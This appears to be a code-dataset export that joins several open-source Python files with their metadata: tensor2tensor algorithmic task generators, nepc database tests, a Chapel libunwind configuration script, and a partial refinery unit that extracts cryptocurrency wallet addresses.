return 2
def generator(self, nbr_symbols, max_length, nbr_cases):
"""Generator for the reversing task on sequences of symbols.
The length of the sequence is drawn uniformly at random from [1, max_length]
and then symbols are drawn uniformly at random from [0, nbr_symbols) until
nbr_cases sequences have been produced.
Args:
nbr_symbols: number of symbols to use in each sequence.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
target-list is input-list reversed.
"""
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols) for _ in range(l)]
yield {"inputs": inputs, "targets": list(reversed(inputs))}
@registry.register_problem
class AlgorithmicReverseDecimal40(AlgorithmicReverseBinary40):
"""Problem spec for algorithmic decimal reversing task."""
@property
def num_symbols(self):
return 10
def zipf_distribution(nbr_symbols, alpha):
"""Helper function: Create a Zipf distribution.
Args:
nbr_symbols: number of symbols to use in the distribution.
alpha: float, Zipf's Law Distribution parameter. Default = 1.5.
Usually for modelling natural text distribution is in
the range [1.1-1.6].
Returns:
distr_map: list of float, Zipf's distribution over nbr_symbols.
"""
tmp = np.power(np.arange(1, nbr_symbols + 1), -alpha)
zeta = np.r_[0.0, np.cumsum(tmp)]
return [x / zeta[-1] for x in zeta]
def zipf_random_sample(distr_map, sample_len):
"""Helper function: Generate a random Zipf sample of given length.
Args:
distr_map: list of float, Zipf's distribution over nbr_symbols.
sample_len: integer, length of sequence to generate.
Returns:
sample: list of integer, Zipf's random sample over nbr_symbols.
"""
u = np.random.random(sample_len)
# Random produces values in range [0.0,1.0); even if it is almost
# improbable(but possible) that it can generate a clear 0.000..0.
return list(np.searchsorted(distr_map, u))
def reverse_generator_nlplike(nbr_symbols,
max_length,
nbr_cases,
scale_std_dev=100,
alpha=1.5):
"""Generator for the reversing nlp-like task on sequences of symbols.
The length of the sequence is drawn from a Gaussian(Normal) distribution
at random from [1, max_length] and with std deviation of 1%,
then symbols are drawn from Zipf's law at random from [0, nbr_symbols) until
nbr_cases sequences have been produced.
Args:
nbr_symbols: integer, number of symbols.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
scale_std_dev: float, Normal distribution's standard deviation scale factor
used to draw the length of sequence. Default = 1% of the max_length.
alpha: float, Zipf's Law Distribution parameter. Default = 1.5.
Usually for modelling natural text distribution is in
the range [1.1-1.6].
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
target-list is input-list reversed.
"""
std_dev = max_length / scale_std_dev
distr_map = zipf_distribution(nbr_symbols, alpha)
for _ in range(nbr_cases):
l = int(abs(np.random.normal(loc=max_length / 2, scale=std_dev)) + 1)
inputs = zipf_random_sample(distr_map, l)
yield {"inputs": inputs, "targets": list(reversed(inputs))}
@registry.register_problem
class AlgorithmicReverseNlplike8k(AlgorithmicProblem):
"""Problem spec for algorithmic nlp-like reversing task."""
@property
def num_symbols(self):
return 8000
def generator(self, nbr_symbols, max_length, nbr_cases):
return reverse_generator_nlplike(nbr_symbols, max_length, nbr_cases, 10,
1.300)
@property
def train_length(self):
return 70
@property
def dev_length(self):
return 70
@registry.register_problem
class AlgorithmicReverseNlplike32k(AlgorithmicReverseNlplike8k):
"""Problem spec for algorithmic nlp-like reversing task, 32k vocab."""
@property
def num_symbols(self):
return 32000
def generator(self, nbr_symbols, max_length, nbr_cases):
return reverse_generator_nlplike(nbr_symbols, max_length, nbr_cases, 10,
1.050)
def lower_endian_to_number(l, base):
"""Helper function: convert a list of digits in the given base to a number."""
return sum([d * (base**i) for i, d in enumerate(l)])
def number_to_lower_endian(n, base):
"""Helper function: convert a number to a list of digits in the given base."""
if n < base:
return [n]
return [n % base] + number_to_lower_endian(n // base, base)
def random_number_lower_endian(length, base):
"""Helper function: generate a random number as a lower-endian digits list."""
if length == 1: # Last digit can be 0 only if length is 1.
return [np.random.randint(base)]
prefix = [np.random.randint(base) for _ in range(length - 1)]
return prefix + [np.random.randint(base - 1) + 1] # Last digit is not 0.
@registry.register_problem
class AlgorithmicAdditionBinary40(AlgorithmicProblem):
"""Problem spec for algorithmic binary addition task."""
@property
def num_symbols(self):
return 2
def generator(self, base, max_length, nbr_cases): # pylint: disable=arguments-differ
"""Generator for the addition task.
The length of each number is drawn uniformly at random in [1, max_length/2]
and then digits are drawn uniformly at random. The numbers are added and
separated by [base] in the input. Stops at nbr_cases.
Args:
base: in which base are the numbers.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
input-list are the 2 numbers and target-list is the result of adding them.
Raises:
ValueError: if max_length is lower than 3.
"""
if max_length < 3:
raise ValueError("Maximum length must be at least 3.")
for _ in range(nbr_cases):
l1 = np.random.randint(max_length // 2) + 1
l2 = np.random.randint(max_length - l1 - 1) + 1
n1 = random_number_lower_endian(l1, base)
n2 = random_number_lower_endian(l2, base)
result = lower_endian_to_number(n1, base) + lower_endian_to_number(
n2, base)
inputs = n1 + [base] + n2
targets = number_to_lower_endian(result, base)
yield {"inputs": inputs, "targets": targets}
@registry.register_problem
class AlgorithmicAdditionDecimal40(AlgorithmicAdditionBinary40):
"""Problem spec for algorithmic decimal addition task."""
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicMultiplicationBinary40(AlgorithmicProblem):
"""Problem spec for algorithmic binary multiplication task."""
@property
def num_symbols(self):
return 2
def generator(self, base, max_length, nbr_cases): # pylint: disable=arguments-differ
"""Generator for the multiplication task.
The length of each number is drawn uniformly at random in [1, max_length/2]
and then digits are drawn uniformly at random. The numbers are multiplied
and separated by [base] in the input. Stops at nbr_cases.
Args:
base: in which base are the numbers.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
input-list are the 2 numbers and target-list is the result of multiplying
them.
Raises:
ValueError: if max_length is lower than 3.
"""
if max_length < 3:
raise ValueError("Maximum length must be at least 3.")
for _ in range(nbr_cases):
l1 = np.random.randint(max_length // 2) + 1
l2 = np.random.randint(max_length - l1 - 1) + 1
n1 = random_number_lower_endian(l1, base)
n2 = random_number_lower_endian(l2, base)
result = lower_endian_to_number(n1, base) * lower_endian_to_number(
n2, base)
inputs = n1 + [base] + n2
targets = number_to_lower_endian(result, base)
yield {"inputs": inputs, "targets": targets}
@registry.register_problem
class AlgorithmicMultiplicationDecimal40(AlgorithmicMultiplicationBinary40):
"""Problem spec for algorithmic decimal multiplication task."""
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicReverseBinary40Test(AlgorithmicReverseBinary40):
"""Test Problem with tiny dataset."""
@property
def train_length(self):
return 10
@property
def dev_length(self):
return 10
@property
def train_size(self):
return 1000
@property
def dev_size(self):
return 100
@property
def num_shards(self):
return 1
@registry.register_problem
class AlgorithmicSortProblem(AlgorithmicProblem):
"""Problem spec for sorting numbers."""
@property
def num_symbols(self):
return max(self.train_length, self.dev_length)
@property
def train_length(self):
return 10
@property
def dev_length(self):
return self.train_length * 2
@property
def unique(self):
"""Unique numbers wo/ replacement or w/ replacement in sorting task."""
return False
def generator(self, nbr_symbols, max_length, nbr_cases):
"""Generating for sorting task on sequence of symbols.
The length of the sequence is drawn uniformly at random from [1, max_length]
and then symbols are drawn (uniquely w/ or w/o replacement) uniformly at
random from [0, nbr_symbols) until nbr_cases sequences have been produced.
Args:
nbr_symbols: number of symbols to use in each sequence.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
target-list is input-list sorted.
"""
for _ in range(nbr_cases):
# Sample the sequence length.
length = np.random.randint(max_length) + 1
if self.unique:
# Sample our inputs w/o replacement.
inputs = np.arange(nbr_symbols)
np.random.shuffle(inputs)
# Truncate to the desired length.
inputs = inputs[:length]
inputs = list(inputs)
else:
inputs = list(np.random.randint(nbr_symbols, size=length))
# Targets are simply the sorted inputs.
targets = list(sorted(inputs))
yield {"inputs": inputs, "targets": targets}
def eval_metrics(self):
defaults = super(AlgorithmicSortProblem, self).eval_metrics()
return defaults + [metrics.Metrics.EDIT_DISTANCE]
@registry.register_problem
class TinyAlgo(AlgorithmicIdentityBinary40):
"""A small algorthmic problem for testing."""
def generate_data(self, data_dir, tmp_dir, task_id=-1):
"""Ganerate data for this problem."""
del tmp_dir, task_id
identity_problem = AlgorithmicIdentityBinary40()
utils.generate_files(
identity_problem.generator(self.num_symbols, 40, 100000),
self.training_filepaths(data_dir, 1, shuffled=True), 100)
utils.generate_files(
identity_problem.generator(self.num_symbols, 400, 10000),
self.dev_filepaths(data_dir, 1, shuffled=True), 100)
@classmethod
def setup_for_test(cls):
"""Setup directories and files required to run the problem."""
tmp_dir = tf.test.get_temp_dir()
shutil.rmtree(tmp_dir)
os.mkdir(tmp_dir)
cls.data_dir = tmp_dir
# Generate a small test dataset
cls().generate_data(TinyAlgo.data_dir, None)
| 32.06044
| 87
| 0.70517
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import numpy as np
from six.moves import range
from tensor2tensor.data_generators import generator_utils as utils
from tensor2tensor.data_generators import problem
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.layers import modalities
from tensor2tensor.utils import metrics
from tensor2tensor.utils import registry
import tensorflow as tf
class AlgorithmicProblem(problem.Problem):
@property
def num_symbols(self):
raise NotImplementedError()
def generator(self, nbr_symbols, max_length, nbr_cases):
raise NotImplementedError()
@property
def train_length(self):
return 40
@property
def dev_length(self):
return 400
@property
def train_size(self):
return 100000
@property
def dev_size(self):
return 10000
@property
def num_shards(self):
return 10
def generate_data(self, data_dir, _, task_id=-1):
def generator_eos(nbr_symbols, max_length, nbr_cases):
for case in self.generator(nbr_symbols, max_length, nbr_cases):
new_case = {}
for feature in case:
new_case[feature] = [
i + text_encoder.NUM_RESERVED_TOKENS for i in case[feature]
] + [text_encoder.EOS_ID]
yield new_case
utils.generate_dataset_and_shuffle(
generator_eos(self.num_symbols, self.train_length, self.train_size),
self.training_filepaths(data_dir, self.num_shards, shuffled=True),
generator_eos(self.num_symbols, self.dev_length, self.dev_size),
self.dev_filepaths(data_dir, 1, shuffled=True),
shuffle=False)
def hparams(self, defaults, unused_model_hparams):
p = defaults
vocab_size = self.num_symbols + text_encoder.NUM_RESERVED_TOKENS
p.modality = {"inputs": modalities.ModalityType.SYMBOL,
"targets": modalities.ModalityType.SYMBOL}
p.vocab_size = {"inputs": vocab_size,
"targets": vocab_size}
p.input_space_id = problem.SpaceID.DIGIT_0
p.target_space_id = problem.SpaceID.DIGIT_1
@registry.register_problem
class AlgorithmicIdentityBinary40(AlgorithmicProblem):
@property
def num_symbols(self):
return 2
def generator(self, nbr_symbols, max_length, nbr_cases):
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols) for _ in range(l)]
yield {"inputs": inputs, "targets": inputs}
@registry.register_problem
class AlgorithmicIdentityDecimal40(AlgorithmicIdentityBinary40):
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicShiftDecimal40(AlgorithmicProblem):
@property
def num_symbols(self):
return 20
def generator(self, nbr_symbols, max_length, nbr_cases):
shift = 10
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols - shift) for _ in range(l)]
yield {"inputs": inputs, "targets": [i + shift for i in inputs]}
@property
def dev_length(self):
return 80
@registry.register_problem
class AlgorithmicReverseBinary40(AlgorithmicProblem):
@property
def num_symbols(self):
return 2
def generator(self, nbr_symbols, max_length, nbr_cases):
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols) for _ in range(l)]
yield {"inputs": inputs, "targets": list(reversed(inputs))}
@registry.register_problem
class AlgorithmicReverseDecimal40(AlgorithmicReverseBinary40):
@property
def num_symbols(self):
return 10
def zipf_distribution(nbr_symbols, alpha):
tmp = np.power(np.arange(1, nbr_symbols + 1), -alpha)
zeta = np.r_[0.0, np.cumsum(tmp)]
return [x / zeta[-1] for x in zeta]
def zipf_random_sample(distr_map, sample_len):
u = np.random.random(sample_len)
return list(np.searchsorted(distr_map, u))
def reverse_generator_nlplike(nbr_symbols,
max_length,
nbr_cases,
scale_std_dev=100,
alpha=1.5):
std_dev = max_length / scale_std_dev
distr_map = zipf_distribution(nbr_symbols, alpha)
for _ in range(nbr_cases):
l = int(abs(np.random.normal(loc=max_length / 2, scale=std_dev)) + 1)
inputs = zipf_random_sample(distr_map, l)
yield {"inputs": inputs, "targets": list(reversed(inputs))}
@registry.register_problem
class AlgorithmicReverseNlplike8k(AlgorithmicProblem):
@property
def num_symbols(self):
return 8000
def generator(self, nbr_symbols, max_length, nbr_cases):
return reverse_generator_nlplike(nbr_symbols, max_length, nbr_cases, 10,
1.300)
@property
def train_length(self):
return 70
@property
def dev_length(self):
return 70
@registry.register_problem
class AlgorithmicReverseNlplike32k(AlgorithmicReverseNlplike8k):
@property
def num_symbols(self):
return 32000
def generator(self, nbr_symbols, max_length, nbr_cases):
return reverse_generator_nlplike(nbr_symbols, max_length, nbr_cases, 10,
1.050)
def lower_endian_to_number(l, base):
return sum([d * (base**i) for i, d in enumerate(l)])
def number_to_lower_endian(n, base):
if n < base:
return [n]
return [n % base] + number_to_lower_endian(n // base, base)
def random_number_lower_endian(length, base):
if length == 1:
return [np.random.randint(base)]
prefix = [np.random.randint(base) for _ in range(length - 1)]
return prefix + [np.random.randint(base - 1) + 1]
@registry.register_problem
class AlgorithmicAdditionBinary40(AlgorithmicProblem):
@property
def num_symbols(self):
return 2
def generator(self, base, max_length, nbr_cases):
if max_length < 3:
raise ValueError("Maximum length must be at least 3.")
for _ in range(nbr_cases):
l1 = np.random.randint(max_length // 2) + 1
l2 = np.random.randint(max_length - l1 - 1) + 1
n1 = random_number_lower_endian(l1, base)
n2 = random_number_lower_endian(l2, base)
result = lower_endian_to_number(n1, base) + lower_endian_to_number(
n2, base)
inputs = n1 + [base] + n2
targets = number_to_lower_endian(result, base)
yield {"inputs": inputs, "targets": targets}
@registry.register_problem
class AlgorithmicAdditionDecimal40(AlgorithmicAdditionBinary40):
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicMultiplicationBinary40(AlgorithmicProblem):
@property
def num_symbols(self):
return 2
def generator(self, base, max_length, nbr_cases):
if max_length < 3:
raise ValueError("Maximum length must be at least 3.")
for _ in range(nbr_cases):
l1 = np.random.randint(max_length // 2) + 1
l2 = np.random.randint(max_length - l1 - 1) + 1
n1 = random_number_lower_endian(l1, base)
n2 = random_number_lower_endian(l2, base)
result = lower_endian_to_number(n1, base) * lower_endian_to_number(
n2, base)
inputs = n1 + [base] + n2
targets = number_to_lower_endian(result, base)
yield {"inputs": inputs, "targets": targets}
@registry.register_problem
class AlgorithmicMultiplicationDecimal40(AlgorithmicMultiplicationBinary40):
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicReverseBinary40Test(AlgorithmicReverseBinary40):
@property
def train_length(self):
return 10
@property
def dev_length(self):
return 10
@property
def train_size(self):
return 1000
@property
def dev_size(self):
return 100
@property
def num_shards(self):
return 1
@registry.register_problem
class AlgorithmicSortProblem(AlgorithmicProblem):
@property
def num_symbols(self):
return max(self.train_length, self.dev_length)
@property
def train_length(self):
return 10
@property
def dev_length(self):
return self.train_length * 2
@property
def unique(self):
return False
def generator(self, nbr_symbols, max_length, nbr_cases):
for _ in range(nbr_cases):
length = np.random.randint(max_length) + 1
if self.unique:
inputs = np.arange(nbr_symbols)
np.random.shuffle(inputs)
inputs = inputs[:length]
inputs = list(inputs)
else:
inputs = list(np.random.randint(nbr_symbols, size=length))
targets = list(sorted(inputs))
yield {"inputs": inputs, "targets": targets}
def eval_metrics(self):
defaults = super(AlgorithmicSortProblem, self).eval_metrics()
return defaults + [metrics.Metrics.EDIT_DISTANCE]
@registry.register_problem
class TinyAlgo(AlgorithmicIdentityBinary40):
def generate_data(self, data_dir, tmp_dir, task_id=-1):
del tmp_dir, task_id
identity_problem = AlgorithmicIdentityBinary40()
utils.generate_files(
identity_problem.generator(self.num_symbols, 40, 100000),
self.training_filepaths(data_dir, 1, shuffled=True), 100)
utils.generate_files(
identity_problem.generator(self.num_symbols, 400, 10000),
self.dev_filepaths(data_dir, 1, shuffled=True), 100)
@classmethod
def setup_for_test(cls):
tmp_dir = tf.test.get_temp_dir()
shutil.rmtree(tmp_dir)
os.mkdir(tmp_dir)
cls.data_dir = tmp_dir
cls().generate_data(TinyAlgo.data_dir, None)
| true
| true
|
790dcc8a39bc21aaba4a154ea6758f2c3a81d1da
| 4,509
|
py
|
Python
|
tests/test_mysql_build.py
|
littlewatkins/nepc
|
3e16e3a9622ca0ebb4484c9e4af253046367773a
|
[
"CC0-1.0"
] | 10
|
2020-06-17T14:48:09.000Z
|
2022-01-12T14:15:56.000Z
|
tests/test_mysql_build.py
|
littlewatkins/nepc
|
3e16e3a9622ca0ebb4484c9e4af253046367773a
|
[
"CC0-1.0"
] | 52
|
2020-06-24T20:09:43.000Z
|
2022-01-16T18:24:01.000Z
|
tests/test_mysql_build.py
|
littlewatkins/nepc
|
3e16e3a9622ca0ebb4484c9e4af253046367773a
|
[
"CC0-1.0"
] | 10
|
2020-06-18T14:24:53.000Z
|
2021-10-15T19:39:42.000Z
|
from nepc import nepc
from nepc.util import util
import pandas as pd
import os
import pytest
import platform
# TODO: remove dependence on csv; put function in scraper that uses built-in
# readlines function
import csv
# TODO: test that all values in [nepc]/tests/data are in the nepc database
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_states_table_has_species_metadata(data_config, nepc_connect):
"""
check that the states table has a species_id column
"""
NEPC_DATA = data_config[0]
number_of_states = util.wc_fxn(NEPC_DATA + 'states.tsv') - 1
df_states = nepc.table_as_df(nepc_connect[1], 'states')
assert len(df_states) == number_of_states
assert 'species_id' in list(df_states.columns)
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_csdata_lines(data_config, nepc_connect):
DIR_NAMES = data_config[1]
cs_lines = 0
for directoryname in DIR_NAMES:
directory = os.fsencode(directoryname)
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".met") or filename.endswith(".mod"):
continue
else:
# subtract 1 to account for header
cs_lines += util.wc_fxn(directoryname + filename) - 1
assert cs_lines == nepc.count_table_rows(nepc_connect[1], "csdata")
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_data_entered(data_config, nepc_connect, local):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
dat_file = row['filename']
df = pd.read_csv(NEPC_DATA + dat_file + '.dat', delimiter='\t',
usecols=['e_energy', 'sigma'])
e_energy, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
# assert e_energy == pytest.approx(df['e_energy'].tolist())
assert sigma == pytest.approx(df['sigma'].tolist())
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_meta_entered(data_config, nepc_connect, local, dbug):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
met_file = row['filename']
if dbug:
print(cs_id, met_file)
e, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
meta_cols = ['cs_id', 'process', 'units_e',
'units_sigma', 'ref', 'lhsA',
'lhsB', 'rhsA', 'rhsB', 'threshold', 'wavelength',
'lhs_v', 'rhs_v', 'lhs_j', 'rhs_j',
'background', 'lpu', 'upu']
with open(NEPC_DATA + met_file + ".met", 'r', newline='') as f:
reader = csv.reader(f, delimiter='\t')
next(reader)
meta_disk = list(reader)[0]
meta_disk = [meta_disk[i] for i in list(range(len(meta_cols)))]
for i in [0, 11, 12, 13, 14]:
meta_disk[i] = (int(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
for i in [2, 3, 9, 10, 16, 17]:
meta_disk[i] = (float(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
meta_db = [nepc.cs_metadata(nepc_connect[1], cs_id)[i]
for i in list(range(0, len(meta_cols)))]
if dbug:
print('meta_db: {}\t from {}'.format(meta_db, met_file))
for i in range(len(meta_cols)):
if dbug:
print('meta_db[{}]: {}\t from {}'.format(str(i), str(meta_db[i]), met_file))
if (type(meta_db[i]) is float):
assert (pytest.approx(meta_disk[i]) ==
pytest.approx(meta_db[i]))
elif meta_db[i] is None:
assert meta_disk[i] == '\\N'
else:
assert meta_disk[i] == meta_db[i]
| 39.552632
| 92
| 0.578399
|
from nepc import nepc
from nepc.util import util
import pandas as pd
import os
import pytest
import platform
import csv
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_states_table_has_species_metadata(data_config, nepc_connect):
NEPC_DATA = data_config[0]
number_of_states = util.wc_fxn(NEPC_DATA + 'states.tsv') - 1
df_states = nepc.table_as_df(nepc_connect[1], 'states')
assert len(df_states) == number_of_states
assert 'species_id' in list(df_states.columns)
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_csdata_lines(data_config, nepc_connect):
DIR_NAMES = data_config[1]
cs_lines = 0
for directoryname in DIR_NAMES:
directory = os.fsencode(directoryname)
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".met") or filename.endswith(".mod"):
continue
else:
cs_lines += util.wc_fxn(directoryname + filename) - 1
assert cs_lines == nepc.count_table_rows(nepc_connect[1], "csdata")
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_data_entered(data_config, nepc_connect, local):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
dat_file = row['filename']
df = pd.read_csv(NEPC_DATA + dat_file + '.dat', delimiter='\t',
usecols=['e_energy', 'sigma'])
e_energy, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
assert sigma == pytest.approx(df['sigma'].tolist())
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_meta_entered(data_config, nepc_connect, local, dbug):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
met_file = row['filename']
if dbug:
print(cs_id, met_file)
e, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
meta_cols = ['cs_id', 'process', 'units_e',
'units_sigma', 'ref', 'lhsA',
'lhsB', 'rhsA', 'rhsB', 'threshold', 'wavelength',
'lhs_v', 'rhs_v', 'lhs_j', 'rhs_j',
'background', 'lpu', 'upu']
with open(NEPC_DATA + met_file + ".met", 'r', newline='') as f:
reader = csv.reader(f, delimiter='\t')
next(reader)
meta_disk = list(reader)[0]
meta_disk = [meta_disk[i] for i in list(range(len(meta_cols)))]
for i in [0, 11, 12, 13, 14]:
meta_disk[i] = (int(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
for i in [2, 3, 9, 10, 16, 17]:
meta_disk[i] = (float(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
meta_db = [nepc.cs_metadata(nepc_connect[1], cs_id)[i]
for i in list(range(0, len(meta_cols)))]
if dbug:
print('meta_db: {}\t from {}'.format(meta_db, met_file))
for i in range(len(meta_cols)):
if dbug:
print('meta_db[{}]: {}\t from {}'.format(str(i), str(meta_db[i]), met_file))
if (type(meta_db[i]) is float):
assert (pytest.approx(meta_disk[i]) ==
pytest.approx(meta_db[i]))
elif meta_db[i] is None:
assert meta_disk[i] == '\\N'
else:
assert meta_disk[i] == meta_db[i]
| true
| true
|
790dccae985884711795bd64d05aa6e0beaa90d5
| 2,068
|
py
|
Python
|
util/chplenv/chpl_unwind.py
|
ShreyasKhandekar/chapel
|
811ad7f6cfa35c6d88f344a90743fe5f9d3c980b
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
util/chplenv/chpl_unwind.py
|
ShreyasKhandekar/chapel
|
811ad7f6cfa35c6d88f344a90743fe5f9d3c980b
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
util/chplenv/chpl_unwind.py
|
ShreyasKhandekar/chapel
|
811ad7f6cfa35c6d88f344a90743fe5f9d3c980b
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import sys
import chpl_platform, overrides, third_party_utils
from utils import error, memoize, warning
@memoize
def get():
platform_val = chpl_platform.get('target')
linux = platform_val.startswith('linux64')
osx = platform_val.startswith('darwin')
val = overrides.get('CHPL_UNWIND')
if val == 'libunwind':
warning("CHPL_UNWIND=libunwind is deprecated. Use CHPL_UNWIND=bundled.")
val = 'bundled'
if linux:
if val == 'bundled':
return 'bundled'
elif val == 'system':
return 'system'
if osx:
if val == 'bundled':
error("Using CHPL_UNWIND=bundled is not supported on Mac OS X."
"\nUse CHPL_UNWIND=system instead.", ValueError)
elif val == 'system':
return 'system'
return 'none'
@memoize
def get_uniq_cfg_path():
return third_party_utils.default_uniq_cfg_path()
@memoize
def get_link_args(unwind):
platform_val = chpl_platform.get('target')
osx = platform_val.startswith('darwin')
# Mac OS X supports libunwind in the C library
# it's not actually a special library.
if osx:
return []
libs = []
# Get the link arguments (e.g. -lunwind)
if unwind == 'system':
# Try using pkg-config to get the libraries to link
# libunwind with.
libs = third_party_utils.pkgconfig_get_link_args(
'libunwind', system=True, static=True)
elif unwind == 'bundled':
# the pkg-config file for libunwind is nice, but as of 1.1
# it doesn't include -lzma when it probably should.
# So try to get the libraries out of libunwind.la.
libs = third_party_utils.default_get_link_args(
'libunwind', libs=['libunwind.la', 'libunwind-x86_64.la'])
# add -ldl so that we can call dladdr
if "-ldl" not in libs:
libs.append("-ldl")
return libs
def _main():
unwind_val = get()
sys.stdout.write("{0}\n".format(unwind_val))
if __name__ == '__main__':
_main()
| 27.210526
| 81
| 0.626692
|
import sys
import chpl_platform, overrides, third_party_utils
from utils import error, memoize, warning
@memoize
def get():
platform_val = chpl_platform.get('target')
linux = platform_val.startswith('linux64')
osx = platform_val.startswith('darwin')
val = overrides.get('CHPL_UNWIND')
if val == 'libunwind':
warning("CHPL_UNWIND=libunwind is deprecated. Use CHPL_UNWIND=bundled.")
val = 'bundled'
if linux:
if val == 'bundled':
return 'bundled'
elif val == 'system':
return 'system'
if osx:
if val == 'bundled':
error("Using CHPL_UNWIND=bundled is not supported on Mac OS X."
"\nUse CHPL_UNWIND=system instead.", ValueError)
elif val == 'system':
return 'system'
return 'none'
@memoize
def get_uniq_cfg_path():
return third_party_utils.default_uniq_cfg_path()
@memoize
def get_link_args(unwind):
platform_val = chpl_platform.get('target')
osx = platform_val.startswith('darwin')
if osx:
return []
libs = []
# Get the link arguments (e.g. -lunwind)
if unwind == 'system':
# Try using pkg-config to get the libraries to link
# libunwind with.
libs = third_party_utils.pkgconfig_get_link_args(
'libunwind', system=True, static=True)
elif unwind == 'bundled':
# the pkg-config file for libunwind is nice, but as of 1.1
# it doesn't include -lzma when it probably should.
libs = third_party_utils.default_get_link_args(
'libunwind', libs=['libunwind.la', 'libunwind-x86_64.la'])
if "-ldl" not in libs:
libs.append("-ldl")
return libs
def _main():
unwind_val = get()
sys.stdout.write("{0}\n".format(unwind_val))
if __name__ == '__main__':
_main()
| true
| true
|
790dccb5c8ce8196f72ffe4f4be41dd4a837a2c2
| 1,019
|
py
|
Python
|
refinery/units/pattern/xtw.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
refinery/units/pattern/xtw.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
refinery/units/pattern/xtw.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from refinery.units.pattern import PatternExtractor
from refinery.units import RefineryCriticalException
from refinery.lib.patterns import wallets
class xtw(PatternExtractor):
"""
Extract Wallets: Extracts anything that looks like a cryptocurrency wallet address.
This works similar to the `refinery.xtp` unit.
"""
def __init__(self, stripspace=False, duplicates=False, longest=False, take=None):
self.superinit(super(), **vars(), ascii=True, utf16=True)
def process(self, data):
pattern = '|'.join(F'(?P<{p.name}>{p.value})' for p in wallets).encode('latin1')
def check(match):
for name, value in match.groupdict().items():
if value is not None:
break
else:
raise RefineryCriticalException('Received empty match.')
return self.labelled(value, kind=name)
yield from self.matches_filtered(memoryview(data), pattern, check)
| 35.137931
| 88
| 0.651619
|
from refinery.units.pattern import PatternExtractor
from refinery.units import RefineryCriticalException
from refinery.lib.patterns import wallets
class xtw(PatternExtractor):
def __init__(self, stripspace=False, duplicates=False, longest=False, take=None):
self.superinit(super(), **vars(), ascii=True, utf16=True)
def process(self, data):
pattern = '|'.join(F'(?P<{p.name}>{p.value})' for p in wallets).encode('latin1')
def check(match):
for name, value in match.groupdict().items():
